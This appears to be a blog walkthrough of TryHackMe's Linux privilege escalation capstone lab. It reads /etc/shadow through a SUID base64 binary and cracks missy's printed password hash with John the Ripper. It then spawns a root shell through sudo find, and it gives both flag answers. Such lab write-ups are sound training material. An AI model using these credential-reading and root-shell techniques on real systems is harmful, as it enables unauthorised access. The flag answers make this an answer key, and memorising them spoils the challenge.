TryHackMe - Linux Privilege Escalation: Capstone Challenge

This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Capstone Challenge tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Linux Privilege Escalation: Capstone Challenge Solution

What is the content of the flag1.txt file?

1. Let's gather info first about the machine

history
whoami
uname -a
uname -r 
/proc/version
/etc/issue
ps
sudo -l
ls
id
ifconfig
netstat -a
netstat -at
netstat -au
netstat -l 
env

1. Let's go to /home where we will discover that there are two other users missy and rootflag. From the history we know that the flag2.txt is in rootflag user. So chances are the flag1.txt is in /home/missy.

   

2. Let's first try checking if there is a kernel exploit.

Let's make a quick look for a kernel exploit for version. 3.10.0-1160.el7.x86_64

1. Let's check for sudo rights sudo -l. Unfortunately leonard has no sudo rights.

2. Check for SUID privileges.

find / -type f -perm -04000 -ls 2>/dev/null

There are multiple binaries which our current user has SUID access. Let's go to https://gtfobins.github.io/#+suid to check if we can exploit any of these for root access.

We can exploit base64 to read /etc/passwd and /etc/shadow and find information about user missy. Unfortunately we can't find any info about rootflag in these files.

LFILE=/etc/passwd
base64 "$LFILE" | base64 --decode

missy:x:1001:1001::/home/missy:/bin/bash

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

1. Let's try cracking the password for missy. Create a local file passwd.txt and shadow.txt and copy the content from the target machine.

2. Unshadow the files:

    unshadow passwd.txt shadow.txt > passwords.txt
   

3. Run john the ripper on passwords.txt. Where we find that the password for missy is Password1

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

1. Now on the target machine let's switch user to missy and use the password **Password1

su missy
cd /home/missy/Documents
cat flag1.txt

Answer: THM-42828719920544

What is the content of the flag2.txt file?

1. Continuing from what we have done above, the current user is now missy. Let's check her privileges by running sudo -l

2. We find out that user missy has sudo priviliges for find. Looking at https://gtfobins.github.io/#+sudo, we discover we have sudo exploits for the find binary.

3. Let's execute what we have found in GTFObins which will spawn a terminal with root privileges.

sudo find . -exec /bin/sh \; -quit

1. Now let's find out the content of flag2.txt which is found in /home/rootflag

Answer: THM-168824782390238

Until next time. Keep learning.

Stay stoked and code. :)

---

I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)